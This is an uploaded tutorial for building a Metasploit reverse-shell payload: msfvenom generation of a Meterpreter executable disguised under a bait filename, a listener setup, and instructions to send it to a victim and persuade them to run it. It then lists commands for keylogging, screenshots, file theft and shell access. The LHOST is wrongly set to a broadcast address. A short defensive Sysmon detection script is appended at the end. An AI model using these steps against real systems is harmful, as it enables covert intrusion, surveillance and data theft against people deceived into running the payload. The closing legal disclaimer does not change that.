Metasploit Payload Guide

This guide provides detailed steps for creating a Metasploit payload and setting up an exploit, including installation, choosing payloads, and starting a listener. It emphasizes the importance of legal and ethical considerations, requiring explicit permission before using these tools. The document also lists various Meterpreter commands for monitoring and controlling the victim's system.

Uploaded by letsdarkit

Metasploit Payload Creation and Exploit Setup (Complete Guide)

1. Install Metasploit Framework

Step 1: Update your system repositories.


sudo apt update

Step 2: Install Metasploit Framework.


sudo apt install metasploit-framework

Step 3: Verify the installation.


msfconsole

2. Start Metasploit Console


msfconsole

3. Choose the Payload and Exploit

Step 1: Select the exploit module, which embeds an executable payload in a PDF file.


use exploit/windows/fileformat/adobe_pdf_embed_exe_nojs

4. Set LHOST and LPORT

Step 1: Set the local IP address (LHOST).


set LHOST 192.168.1.255

Step 2: Set the local port (LPORT) to any available port.


set LPORT 4444

5. Generate the Payload

Step 1: Generate the executable payload using msfvenom.


msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.255 LPORT=4444 -f exe -o /path/to/save/payload.exe

- Replace /path/to/save/ with the actual directory where you want to save the
payload.exe file.
- Ensure that the payload is generated with the correct LHOST and LPORT values.

6. Move Payload to Desired Location

Step 1: Once the payload is generated, move it to the location where you want to
save it.

mv payload.exe /desired/location/

You can use any file name for the payload (e.g., 100+darkwebtools.exe).

7. Start the Listener in Metasploit

Step 1: Start a new handler session to listen for the incoming reverse connection.

use exploit/multi/handler

Step 2: Set the payload to windows/meterpreter/reverse_tcp.

set payload windows/meterpreter/reverse_tcp

Step 3: Set LHOST and LPORT to the same values as before.


set LHOST 192.168.1.255
set LPORT 4444

Step 4: Start the listener.


exploit

8. Send the Payload to the Victim

Send the payload.exe file (e.g., 100+darkwebtools.exe) to the victim. Convince them
to run the executable. Once the victim opens it, the reverse connection will be
triggered, and you will get a Meterpreter session in your listener.

9. Monitor the Victim's System via Meterpreter

Step 1: After the victim runs the executable, a session will be created. Check the
active sessions.

sessions

Step 2: Interact with the active session.


sessions -i 1

10. Meterpreter Commands

Once you have access to the victim's system, you can use the following commands for
monitoring and control:

- Get System Info:


sysinfo

- Take Screenshot:

screenshot

- Start Keylogger:

keyscan_start

- Upload Files:

upload /local/file /remote/destination

- Download Files:

download /remote/file /local/destination

- Run System Commands (e.g., open calculator):


execute -f calc.exe

- Access Command Shell:


shell

11. Additional Monitoring Commands

- Check Network Info:


ipconfig

- Access File System:

ls
cd /path/to/target/directory

- Capture Keystrokes (Keylogger):


keyscan_start
keyscan_dump

Important Notes:

1. Always get explicit permission from the owner of the target system before using
these tools. Unauthorized access is illegal and unethical.
2. Educational purposes only – Use this knowledge to secure systems and learn
penetration testing, not for malicious activity.
3. Legal Compliance: Be sure to comply with your local laws and ethical standards
when performing penetration tests.
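
For the defensive side of sections 8 and 9, the following added example (not part of the original guide) correlates Sysmon process-creation and network-connection events to flag an executable started from a user-writable folder that opens an outbound connection seconds later, which is the behaviour a reverse-connection payload shows on the host. The sample events, paths, folder list, port allow-list and 30-second window are constructed assumptions; only the Sysmon field names are real.

```python
from datetime import datetime, timedelta

# Constructed sample events using Sysmon field names (Event ID 1 = process
# creation, Event ID 3 = network connection). GUIDs, paths and IPs are made up.
SAMPLE_EVENTS = [
    {"EventID": 1, "UtcTime": "2024-05-01 10:00:00.000", "ProcessGuid": "{A1}",
     "Image": r"C:\Users\bob\Downloads\invoice_viewer.exe"},
    {"EventID": 3, "UtcTime": "2024-05-01 10:00:02.500", "ProcessGuid": "{A1}",
     "Initiated": "true", "DestinationIp": "192.168.1.50", "DestinationPort": "4444"},
    {"EventID": 1, "UtcTime": "2024-05-01 10:01:00.000", "ProcessGuid": "{B2}",
     "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe"},
    {"EventID": 3, "UtcTime": "2024-05-01 10:01:01.000", "ProcessGuid": "{B2}",
     "Initiated": "true", "DestinationIp": "203.0.113.10", "DestinationPort": "443"},
    {"EventID": 1, "UtcTime": "2024-05-01 10:02:00.000", "ProcessGuid": "{C3}",
     "Image": r"C:\Users\bob\AppData\Local\Temp\setup.exe"},
    {"EventID": 3, "UtcTime": "2024-05-01 10:09:00.000", "ProcessGuid": "{C3}",
     "Initiated": "true", "DestinationIp": "198.51.100.7", "DestinationPort": "8443"},
]

USER_WRITABLE = ("\\downloads\\", "\\desktop\\", "\\appdata\\local\\temp\\")  # assumed list
COMMON_PORTS = {80, 443}  # assumed allow-list; other ports raise the severity
FMT = "%Y-%m-%d %H:%M:%S.%f"

def find_callbacks(events, window=timedelta(seconds=30)):
    """Flag processes started from a user-writable path that initiate an
    outbound connection within `window` of starting."""
    started = {}  # ProcessGuid -> (start time, image path)
    alerts = []
    for ev in sorted(events, key=lambda e: e["UtcTime"]):
        when = datetime.strptime(ev["UtcTime"], FMT)
        guid = ev["ProcessGuid"]
        if ev["EventID"] == 1:
            if any(p in ev["Image"].lower() for p in USER_WRITABLE):
                started[guid] = (when, ev["Image"])
        elif ev["EventID"] == 3 and ev.get("Initiated") == "true" and guid in started:
            t0, image = started[guid]
            if when - t0 <= window:
                port = int(ev["DestinationPort"])
                alerts.append({"image": image, "dest": f'{ev["DestinationIp"]}:{port}',
                               "delay_s": (when - t0).total_seconds(),
                               "severity": "medium" if port in COMMON_PORTS else "high"})
    return alerts

if __name__ == "__main__":
    for alert in find_callbacks(SAMPLE_EVENTS):
        print(alert)
```

The listener port in the guide is arbitrary, so the rule keys on the launch path and timing rather than on port 4444; the port only adjusts severity.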
